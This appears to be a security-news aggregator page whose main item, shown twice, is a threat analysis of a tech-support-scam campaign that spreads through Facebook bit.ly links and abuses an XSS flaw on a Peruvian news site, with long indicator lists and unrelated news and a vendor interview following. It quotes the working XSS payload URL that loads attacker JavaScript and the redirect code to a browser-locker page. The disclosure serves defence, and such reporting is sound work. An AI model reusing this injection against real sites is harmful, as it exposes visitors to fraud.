Malware Devil

Wednesday, October 21, 2020

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

bit[.]ly/2BnL1gb
bit[.]ly/2BT9fyU
bit[.]ly/2Ci8vU7
bit[.]ly/2CmSeNo
bit[.]ly/2CYEQ2V
bit[.]ly/2D1Xt64
bit[.]ly/2Do8rTA
bit[.]ly/2DoLMGh
bit[.]ly/2DpBAO3
bit[.]ly/2W5TLOW
bit[.]ly/2WggcRI
bit[.]ly/2Whuz8f
bit[.]ly/3ffMoLv

bit[.]ly/2XylAQS
bit[.]ly/2YQ6Nll
bit[.]ly/2YUEJh1
bit[.]ly/2Z8u2Y6
bit[.]ly/2Zf9f5g
bit[.]ly/30B8frz
bit[.]ly/30OBrge
bit[.]ly/312yDMe
bit[.]ly/2E4iPQg
bit[.]ly/2EVqXDf
bit[.]ly/2NJPNad
bit[.]ly/2SKSKtG
bit[.]ly/2W0EVJx

bit[.]ly/313QfpY
bit[.]ly/31nuzVZ
bit[.]ly/33j18GQ
bit[.]ly/33RHphZ
bit[.]ly/33TnMGp
bit[.]ly/33U4KzW
bit[.]ly/36XhNlF
bit[.]ly/39kxqT9
bit[.]ly/39Lpf2I
bit[.]ly/3a1vjnz
bit[.]ly/3ehykAR
bit[.]ly/3eQ8Rib
bit[.]ly/3fDTxpu

bit[.]ly/3fNbwdP
bit[.]ly/3gfDRJw
bit[.]ly/3gi7sTi
bit[.]ly/3gSXmbh
bit[.]ly/3gvG3gI
bit[.]ly/3hlBUvE
bit[.]ly/3iLGu8b
bit[.]ly/3jcvfVC
bit[.]ly/3jk66sh
bit[.]ly/3jU5Q3Z
bit[.]ly/3kgIwxF

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

abagailliondaye[.]site
addiatraciedur[.]casa
adianaeadmundfaunia[.]casa
adriaensherveymanson[.]space
aidadarnallkondon[.]casa
ailynhoratiowallford[.]space
akselholm[.]space
alanaweekes[.]casa
alexandervolodin[.]site
alexaschulteisz[.]space
alexinasandersjeddy[.]casa
alexinemunroelanni[.]space
alineorbadiahbakerman[.]space
allegradoyclaudette[.]space
almedacorbiemyrta[.]club
alondramendez[.]space
aloysiapatbergwall[.]space
altapippomarjory[.]casa
alvenystrom[.]site
alysonbartolemohaze[.]casa
amandarocha[.]site
amandisamsonpattin[.]space
ameliabernays[.]bar
ameliebrown[.]icu
amiesinclair[.]space
anallesewolfiecacie[.]space
andreachrissyglaudia[.]space
andrewvasiliev[.]space
angelicajohnsen[.]casa
angelilaireberns[.]space
annadianakelleybowra[.]space
annalisearchylandau[.]casa
annicecurreyinglebert[.]site
anthewaltonbacon[.]casa
anupakarinen[.]space
aputsiaqjosefsen[.]space
arlienerutgeremmey[.]site
arlindapaulotrix[.]casa
ashlyjdavielonee[.]site
audricpanetier[.]space
aurooragabrielepahl[.]site
auroraaylmarosmo[.]casa
avalundstrom[.]casa
balazsforgacs[.]space
barbialbiedanit[.]space
beatrizmartins[.]space
beaurbandonoho[.]casa
belindapattinyorick[.]site
benbaxter[.]casa
berenicebrighamklug[.]site
bertapisano[.]casa
bertharockwellgans[.]space
bertinarothesmerolda[.]site
bertinebrendintremml[.]casa
bertyemmanuelbeaufert[.]site
bettineallynnoemi[.]casa
billyemichelethacher[.]casa
billygreen[.]casa
blaireredemalee[.]space
boriskapalfi[.]casa
caitlinluigigypsie[.]casa
caitlinpetersen[.]space
callumlittle[.]site
calvinbridges[.]club
careyheinrikornstead[.]space
carlaellwoodobadiah[.]casa
carlyejoaquinfrederica[.]site
carlynnshelldorey[.]space
carmeltristanjeremiah[.]casa
carolinepeadarstutman[.]space
carynkristoforopleione[.]site
catharinaewansouthworth[.]space
celiechristofferrochester[.]casa
celinagrahamtollmann[.]site
charlesthornton[.]bar
charleyferguson[.]space
cherilynrolferoselin[.]casa
cherishhurleyburrus[.]casa
cherlyncourtgrannias[.]site
cherylkristopherannice[.]site
chicasackville[.]casa
chicovangriensven[.]site
christacullinclem[.]space
christinehermansen[.]space
christoperkim[.]club
chrysaheinrikromo[.]space
cibranjasso[.]casa
cilkabuddieradmen[.]space
clarettanicolahannus[.]site
clareykonstantinelipkin[.]site
clariangieeddi[.]space
codieriewebb[.]site
colenerodricksipple[.]space
colettenildelaney[.]space
collycazlal[.]club
constantachaddcoleen[.]space
coralineottomalcom[.]space
cornelagregoireriannon[.]casa
correnaosbornwatters[.]space
corriethaddusnero[.]casa
courtnaycullanartimas[.]space
courtneydunn[.]site
courtneyshaw[.]casa
csabatotth[.]space
cybilloatesotho[.]club
cynthiejoshuagoetz[.]casa
dagurarnbjarnarson[.]space
daniaumbertobraunstein[.]site
darellecorteldridge[.]space
darlaleopoldlandri[.]space
darlenegarcia[.]space
deanstreeten[.]club
debbynoelfugazy[.]casa
diederikfaro[.]casa
ditajaridhancock[.]space
dominicbyrne[.]club
donaldking[.]casa
donatilavela[.]casa
doniellejarrettherwick[.]space
doratiboldjapeth[.]casa
dorelleolinsiusan[.]casa
dorenerossclemente[.]casa
dorisferguson[.]site
dorriestubridie[.]casa
dronafeliziowallace[.]club
dyannrichalona[.]site
eberardobustamante[.]casa
eboneebritseltzer[.]space
edittafanucci[.]space
eduardasantos[.]casa
edwardmarr[.]casa
elbertinawaymalina[.]site
electratobinlori[.]space
elinorecyrusrosalind[.]site
elisabetmahmudziguard[.]casa
ellasaari[.]space
ellereid[.]site
ellihermannsheldon[.]casa
emmalynhenriwinsor[.]site
erdagarephenica[.]club
erminiekurtisberard[.]site
ethelinemuffinpierrette[.]casa
ethelynezekielpepito[.]space
evagorbunova[.]space
evascarfe[.]space
evelinemikolviveca[.]space
ezinetshishani[.]casa
fancieogdanwanyen[.]site
fannymackkellby[.]site
fatramcharan[.]icu
feikjewestenbrink[.]icu
felicytasobczak[.]space
felixkomarov[.]site

fiannkipparisaac[.]casa
filidelucianrus[.]casa
floraabrahamsson[.]site
florisburrparadies[.]space
franceskint[.]casa
frankmejias[.]space
freddieholden[.]space
fredrikigland[.]site
frigyesbakos[.]club
fulcovangemert[.]casa
gabrielduffy[.]casa
gabriellacunneen[.]club
gabriellamarsden[.]space
gaynorchevaliermollie[.]space
georgecreswick[.]icu
germaisenia[.]uno
gertiereggyun[.]casa
gianninafonville[.]store
gillianlindseymobley[.]casa
ginnikipvedis[.]casa
giudittademetrestuppy[.]site
giulioferrari[.]club
glennconantkaete[.]casa
greerjorgangarcon[.]casa
gretchenmorgenfrans[.]casa
guineveremorgenphilipson[.]space
gundolphochubbbaggins[.]space
gusursongerhard[.]space
gwendolenworthcower[.]club
hamzenolet[.]space
hanabinkykasevich[.]casa
hannahkaur[.]space
harriottheodoricmartinez[.]space
heidiingamarkaenel[.]casa
hollyhardy[.]space
hopechaddbrogle[.]site
hyacinthreuvengronseth[.]casa
ileanaroryfarika[.]casa
ilonayusupova[.]space
ilsepiirto[.]casa
ingebergrudyjacintha[.]space
ingridharlinaekerly[.]casa
iolandecreightonnona[.]space
iritapietreklow[.]space
isabelaalmeida[.]site
isembardgreenhand[.]store
issysydneycharmain[.]site
isumbrasbrandagamba[.]club
ivalufilemonsen[.]casa
ivaluhansen[.]casa
ivalularsen[.]site
iversoreide[.]site
jacobsutherland[.]site
jacquelinehampson[.]space
jadechadzoara[.]casa
jaimecarliedaye[.]casa
jakebooth[.]club
jamesmiller[.]casa
jamesspofforth[.]club
jamieumstead[.]uno
janholm[.]site
jareddubose[.]space
jaromirbrynda[.]casa
jaspercaraballo[.]casa
jeanellejermainoleg[.]casa
jeannabroderickgrunenwald[.]casa
jenniferreed[.]club
jenninelammondtorto[.]site
jennovankooij[.]icu
jerrileeharrydyun[.]casa
jesperkristoffersen[.]site
jessamynfreemonhibben[.]casa
jessisylvesterkenison[.]space
jillaynemagnumallys[.]space
joaniealisteratwekk[.]casa
joanywilting[.]casa
joellydaltonhamel[.]site
joeyrudolfrebhun[.]casa
johnapascaleikey[.]casa
johnclark[.]icu
joinspinclass[.]com
jordannaholttakken[.]casa
jorgritter[.]space
josjasalah[.]site
juansmotherman[.]club
judiecosimoprudence[.]site
julieravn[.]space
juliettaheywooddunham[.]casa
kacyandershugon[.]site
kacybenoitarley[.]space
kajaaurthurzebulen[.]space
kalmandobos[.]site
karenbrands[.]casa
karitasvalberg[.]site
karlenronniesaidel[.]casa
karolgraememaye[.]space
kasperronning[.]casa
kasszaredphelan[.]space
katerinechuchowinston[.]space
katherinacedricbrynne[.]site
katinarooseveltmattox[.]space
katrinebrandt[.]casa
katushapallardolino[.]space
kauecavalcanti[.]site
kayleeamorymafalda[.]casa
keadaly[.]club
kerrychavez[.]icu
kessiaharonwentworth[.]space
kingapawlak[.]space
kippieeliasrachaba[.]space
kirakipplek[.]space
kirstialechulbard[.]space
kolosszegedi[.]site
kristelichaboderina[.]space
kristennowellsholley[.]casa
kristesylvesterblossom[.]casa
kristinejacobsen[.]site
krysiawojciechowska[.]casa
krystaltommyabell[.]casa
kylaasherrosenstein[.]space
kylamontishetrit[.]casa
laneydavinangell[.]site
larissasebastienhubie[.]space
laurelhewbasset[.]site
lauriannegermaynealithia[.]casa
lauriannetobyevalyn[.]casa
leannaralfpicardi[.]club
lechoslawczarnecki[.]site
lesliestorey[.]casa
lettiiorgoscathe[.]space
lettitracegow[.]casa
liaonio[.]site
liatimoteojacqui[.]casa
livandrea[.]icu
loisepatrickardie[.]space
lonnibasiliozirkle[.]casa
lorajerriprimavera[.]space
lorenzagiovannigiacomo[.]site
loriannalodovicoradloff[.]club
lorrinrodmignonne[.]space
lucievanrinsum[.]club
luisbarros[.]casa
lynseybrunotatman[.]casa
mabwinfrededelsten[.]space
maddyjarridolnee[.]site
madelindarrelbruyn[.]casa
marcellinevidovicmilinda[.]casa
marcoklug[.]casa
margarettedukieaeriel[.]space
margitfreedmangrider[.]site
margretedgarbabbie[.]casa
margretglynnadelice[.]casa
mariamnilsson[.]site

mariapfaff[.]casa
mariuslovstrom[.]casa
mariuszdudek[.]site
marnizebulonmarchese[.]space
masonpatel[.]space
mathildacaseopportina[.]site
maurakonradebenezer[.]club
mauritznystrom[.]space
maximinovaldes[.]casa
meghanncreightonoster[.]space
meralvangeer[.]space
merielbondonbelldas[.]space
merisbuironstatis[.]casa
merrillingeroscar[.]club
merryfabioavruch[.]space
meyaakesson[.]casa
mialeistad[.]space
mieszkoczarnecki[.]space
mikaelenoksen[.]site
milissentflorychard[.]casa
miriamvernesopher[.]space
mirnaandreyfischer[.]casa
mollieyveswestfall[.]site
monahreamonnjacintha[.]casa
morganajehukinchen[.]site
muirenolanhaydon[.]site
myrtleruss[.]casa
nanagal[.]icu
naomibolton[.]casa
nattybrendonleverett[.]casa
nedaholmesmilly[.]site
neddaboneamaras[.]club
nessiebogeyeugenio[.]site
nickieearliehelbona[.]site
nissaalfonsealexis[.]site
nixieholtadamski[.]space
noravestre[.]site
norbertschuil[.]casa
noreanlarsornas[.]casa
nursellamo[.]space
odelladevlinaleksandr[.]space
odettafalknerlenni[.]site
oliverraaen[.]space
olliemaclean[.]casa
omarbazhaev[.]space
paolaverhoef[.]space
peggyakselsmalley[.]site
penelopaelbertsonny[.]space
philgiordanolibbey[.]site
pongorfoldesi[.]casa
poppyinglissparke[.]casa
poulkristensen[.]space
quinnagustezandt[.]casa
rafinelisse[.]bar
ranabramran[.]casa
raquelaeduinochiles[.]casa
raymondsmith[.]casa
rayyangordon[.]casa
reavictorcherrita[.]casa
reynirjonatansson[.]site
reynirottosson[.]space
rianonkentonlira[.]space
ricagaylebernie[.]site
ricidewittflatto[.]space
riviboyceyvento[.]site
rivkahmayneazpurua[.]space
roannefrancoisgenny[.]space
roannestanislausolimpia[.]casa
robertfoley[.]space
robertsaunders[.]casa
robertweaver[.]space
ronaldestep[.]casa
ronnymortiesanburn[.]casa
rosabelleellswertheisenhart[.]casa
roseanniveadlay[.]casa
rosejaymeraouf[.]space
rosemondelelandneil[.]site
rupertaeddiefalk[.]space
sabrinagaertner[.]space
salviamugwort[.]space
samamerigoaldridge[.]site
samarialucienquinn[.]casa
samarknape[.]uno
samukatorok[.]space
sandraglebova[.]space
sanyaimmink[.]icu
sareeellereypenland[.]casa
savinareinwaldsteffen[.]site
scarlettlaycatherina[.]site
shannonmanfredoctave[.]site
shaynefrancklynwynne[.]site
sheelafarrisgare[.]casa
sheila-kathryntysonlatia[.]club
sheilayork[.]space
sherriehankcha[.]casa
sherriraddiechester[.]casa
sibyllepearcelaney[.]site
silviearaldorory[.]space
simonefreitag[.]club
sisilehoweyivanah[.]casa
siskolaatikainen[.]casa
solsausamov[.]space
starernestmcmillan[.]site
suddhosi[.]com
suewaldotacklind[.]casa
suomariihijarvi[.]casa
suzywordenmycah[.]casa
sylviakroon[.]site
tallydewsheley[.]club
taniburnabydarrill[.]casa
tanyarayhasty[.]casa
tedraadottinger[.]casa
teodorademetripettifer[.]casa
terrinathanaelgahl[.]space
theafrederiksen[.]space
thelmaantoniusibrahim[.]space
theresawalsh[.]icu
tienanevillepetrine[.]casa
tillyby[.]club
tillyheerson[.]space
timurvida[.]space
tinesidneefiedling[.]site
tomawyndhamrudolfo[.]space
topivuorinen[.]site
tordamdal[.]site
totalgodin[.]com
toussaintjobin[.]site
trinemathiasen[.]site
trudienehemiahblodget[.]space
trungbliek[.]site
utairvinshirk[.]space
veganystrom[.]space
veroniquegilbertonickey[.]casa
vesteinnyngvason[.]space
vibrockienorina[.]casa
vincenzokaur[.]space
vinniechrissiearlynne[.]site
vioarbirgisson[.]space
vitoriaoliveira[.]casa
wallislonkerrill[.]club
wilcomesandheaver[.]site
willhighett[.]club
williamsimonsen[.]casa
wynnedelmoremaison[.]space
wynnielorenprisca[.]casa
wynnyjobgratt[.]space
xavierholroyd[.]club
yingahmad[.]space
yoshikojaeheisser[.]casa
zakariaeotter[.]space
zomborgyarmathi[.]casa
zorinetownspiegelman[.]casa

Phone numbers

833-801-7232
844-762-9462
844-762-9467
844-793-6869
844-793-8637
844-794-5246
844-794-6678
844-794-6786
844-796-2946
844-833-8289

844-909-2777
855-241-4508
855-470-1718
855-470-1720
855-470-1721
855-470-1724
855-472-1830
855-472-1832
855-472-1833
855-885-0741

855-472-1840
855-472-1844
855-626-2563
855-805-1138
855-805-1278
855-805-1285
855-827-2595
855-827-3045
855-885-0784
855-885-0818

855-885-0830
855-885-0833
877-429-1222
888-597-1444
888-851-3768
888-851-5754
888-865-2158
888-866-6127
888-866-6299

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability-2/?utm_source=rss&utm_medium=rss&utm_campaign=xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability-2

FIRST Announces Cyber-Response Ethical Guidelines

The 12 points seek to provide security professionals with advice on ethical behavior during incident response.

The post FIRST Announces Cyber-Response Ethical Guidelines appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/first-announces-cyber-response-ethical-guidelines/?utm_source=rss&utm_medium=rss&utm_campaign=first-announces-cyber-response-ethical-guidelines

Oracle Releases Another Mammoth Security Patch Update

October’s CPU contains 402 patches for vulnerabilities across 29 product sets, many of which are remotely executable without the need for authentication.

The post Oracle Releases Another Mammoth Security Patch Update appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/oracle-releases-another-mammoth-security-patch-update/?utm_source=rss&utm_medium=rss&utm_campaign=oracle-releases-another-mammoth-security-patch-update

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

Malicious links shared via Facebook

Abuse of cross-site scripting vulnerability

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

bit[.]ly/3fNbwdP
bit[.]ly/3gfDRJw
bit[.]ly/3gi7sTi
bit[.]ly/3gSXmbh
bit[.]ly/3gvG3gI
bit[.]ly/3hlBUvE
bit[.]ly/3iLGu8b
bit[.]ly/3jcvfVC
bit[.]ly/3jk66sh
bit[.]ly/3jU5Q3Z
bit[.]ly/3kgIwxF

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

Phone numbers

833-801-7232
844-762-9462
844-762-9467
844-793-6869
844-793-8637
844-794-5246
844-794-6678
844-794-6786
844-796-2946
844-833-8289

844-909-2777
855-241-4508
855-470-1718
855-470-1720
855-470-1721
855-470-1724
855-472-1830
855-472-1832
855-472-1833
855-885-0741

855-472-1840
855-472-1844
855-626-2563
855-805-1138
855-805-1278
855-805-1285
855-827-2595
855-827-3045
855-885-0784
855-885-0818

855-885-0830
855-885-0833
877-429-1222
888-597-1444
888-851-3768
888-851-5754
888-865-2158
888-866-6127
888-866-6299

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=xss-to-tss-tech-support-scam-campaign-abuses-cross-site-scripting-vulnerability

Delphix Partner Spotlight on Orasi

Delphix Partner Spotlight on Orasi
michelle
Wed, 10/21/2020 – 13:40

We spoke with Terry Brennan, Managing Director at Orasi, to learn how the company is helping customers blaze new trails in DevSecOps delivery and drive business transformation.

Lenore Adam

Oct 21, 2020

Tell us about Orasi and your core competencies.

We help our customers achieve faster, more predictable, and higher quality software delivery and operations by bringing deep DevSecOps expertise, strong technology partnerships like Delphix, and proven approaches across the DevSecOps spectrum.

We offer a breadth of DevSecOps services including assessments, strategy and roadmaps, implementing automation tooling, process change/maturity, facilitating cultural change, and much more.

Our core competency is driving client success across the lifecycle by establishing a DevSecOps pipeline with continuous flow into production. This encompasses not only the familiar CI/CD processes but also includes specialized areas such as continuous data, continuous testing, continuous security, and continuous monitoring.

Our goal is to bring the front end development, pipeline, security, and ongoing operations together to form a cohesive, efficient system for the many verticals we support—from financial services and healthcare to manufacturing and retail.

What do you mean by ‘continuous data’?

We work with agile teams throughout the entire software lifecycle—from ideation, development, build, and testing—to ensure the pipeline is production-relevant. That relates to the environment configuration itself as well as the test data used.

So we take the CI/CD pipeline and add the concept of continuous data. Essentially continuous data means automating the process of collecting production data, securing it, then providing automated access and restoration for use in the application delivery release train.

To establish a high quality, predictable pipeline, shift left testing needs to be as realistic as possible, as early as possible. Without production-quality test data, teams won’t expose the edge cases they need to thoroughly test. They run the risk of not being able to identify a complex data scenario that causes something to blow up further down the pipeline where it’s harder to triage and more expensive to fix.

With continuous data, data is now as agile as code. Access to ephemeral test environments that are automatically fed with secure, virtualized data allows dev and test teams to truly move at a pace required by the business.

Can you describe how you assess your client’s software pipeline?

Most of our clients have started their DevOps journey, and wherever they are in terms of maturity, tooling, and processes we work with them to convert their plan into reality.

We have several dozen categories that we look at as part of the assessment—their build and unit test process, how long it takes to get feedback to developers after functional testing, types of tools used, manual processes that can be eliminated, documentation, and more.

We start with a standard approach for the assessment, but every customer is different. Some of our larger clients have 20 different tech stacks to address, for example. In the end, we create a custom solution and a detailed roadmap for moving forward.

We are not just automating processes; we re-architect processes and help customers think about their pipelines in a completely different way. When we build out the future state we treat all pipeline elements as code. Everything should be integrated into an automated process, so data virtualization is essential.

Driving faster testing and delivering test data quickly increases the speed and flow of the entire pipeline. Providing production-relevant data to application teams earlier in the release cycle means not only rapid cycle time but better feedback to address issues, which in turn have an exponential impact on cycle time and application quality.

When a pull request is made, for example, all elements of that build are tagged and versioned. If a problem occurs along the pipeline or even after changes are released into production, customers can automatically recreate the exact code changes, database versions used, and test configurations using Delphix.

What is the impact of continuous data as clients start to streamline processes?

Often clients are completely manual or have some scripting in place, so the improvements that continuous data and continuous testing bring can be pretty significant. In our initial assessment, we may find that running a single change through the pipeline originally takes 8-10 days plus multiple people.

But if the pipeline elements are treated as code, all elements are automated and every testbed is working from the exact same virtual database, we can run multiple tests simultaneously. Starting with a clean, predictable state of the test data available to all test environments, we can have unlimited test runs going at the same time.

We are able to turn a traditionally serial approach into an extremely efficient parallel process. When they can run multiple changes at the same time and execute to the same purpose using identical datasets, this can be a very powerful transformation.

Transitioning from manual serial testing to automated parallel testing is really powerful.

Companies have to move to this kind of radical process change to advance what they are doing and meet the incredibly demanding cycle times required by the business. There is an acceleration of business needs that, in turn, requires an acceleration in the delivery of innovation to meet those needs.

To move from cycle times that were at best once a quarter, to once a day, or even at every pull request, it’s critical to run tests through the pipeline in parallel. Delphix automates data delivery for immediate access and provides test teams running in parallel with the exact dataset.

You mentioned that you help clients improve not only processes and technologies, but also people and culture. How do you go about doing that?

We also administer a value stream review to understand where the blockages across the lifecycle and pipeline. We look at the technology and tools needed to improve the process, but we also look at the organization and the people as key elements to building the connective tissue needed for long-term success.

For example, people will often focus on a tool that they think will solve all their problems. The tool may add value, but the people may not be trained properly, or culturally they may not be ready to evolve roles and responsibilities. Traditionally, silos were built to keep people separate and focused, and it’s hard to break those down to foster a new era of collaboration. If people aren’t ready for change, aren’t communicating well, and don’t yet understand how the changes will help them do their work better, then they often become roadblocks and sabotage success.

When we introduce new technology, we work with the client to understand who the stakeholders are to build a comprehensive training plan and build out an implementation roadmap that involves everyone. Transformation means roles and responsibilities might change in the new equation.

We will conduct a POC to see how the technology works but in the end, the technology itself has finite combinations of challenges that can be methodically identified and addressed. People and culture will present an infinite number of challenges. So a key element of the POC is to see how people should be aligned, what processes need to change, and what roadblocks need to be cleared. Customers need to do this before they scale.

We live agile ourselves. Delivering on a transformation strategy is all agile in nature. A methodical approach keeps us aligned with the client. We do daily scrums and work in two-week sprints, so they can monitor progress and feel confident in the execution.

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.
Read More

The post Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/bug-parade-nsa-warns-on-cresting-china-backed-cyberattacks/?utm_source=rss&utm_medium=rss&utm_campaign=bug-parade-nsa-warns-on-cresting-china-backed-cyberattacks

As Smartphones Become a Hot Target, Can Mobile EDR Help?

Lookout Security debuts a mobile endpoint detection and response offering that will integrate into its mobile security platform.

The post As Smartphones Become a Hot Target, Can Mobile EDR Help? appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/as-smartphones-become-a-hot-target-can-mobile-edr-help/?utm_source=rss&utm_medium=rss&utm_campaign=as-smartphones-become-a-hot-target-can-mobile-edr-help

ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards

BOULDER, Colo.—October 21, 2020—ManagedMethods, the leading Google Workspace and Microsoft 365 cybersecurity, student safety and compliance platform for K-12 school districts, today announced the company has been named the Gold winner in the “Education Cloud-Based Solution” category in the 2020 Golden Bridge Business and Innovation Awards. ManagedMethods has also been named a Silver winner in […]

The post ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards appeared first on ManagedMethods.

The post ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards appeared first on Security Boulevard.

The post ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/managedmethods-recognized-as-the-education-cloud-based-solution-gold-winner-in-the-2020-golden-bridge-awards/?utm_source=rss&utm_medium=rss&utm_campaign=managedmethods-recognized-as-the-education-cloud-based-solution-gold-winner-in-the-2020-golden-bridge-awards

Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row

We’re thrilled to announce that Gartner has named Signal Sciences a Visionary in the 2020 Magic Quadrant for Web Application Firewalls (WAF)1 for the second year running. Last year was our first entrance in the 2019 Gartner Magic Quadrant for…

The post Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row appeared first on Signal Sciences.

The post Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row appeared first on Security Boulevard.

The post Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/signal-sciences-recognized-as-a-visionary-in-gartner-magic-quadrant-for-web-application-firewalls-two-years-in-a-row/?utm_source=rss&utm_medium=rss&utm_campaign=signal-sciences-recognized-as-a-visionary-in-gartner-magic-quadrant-for-web-application-firewalls-two-years-in-a-row

20 new Cisco security advisories for ASA and Firepower with CVSS>7: https://tools.cisco.com/security/center/publicationListing.x, (Wed, Oct 21st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

